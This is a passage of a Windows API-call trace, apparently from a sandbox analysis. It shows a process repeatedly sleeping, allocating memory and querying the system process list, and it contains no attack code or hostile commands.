NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.760] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.825] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.840] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.889] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.904] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 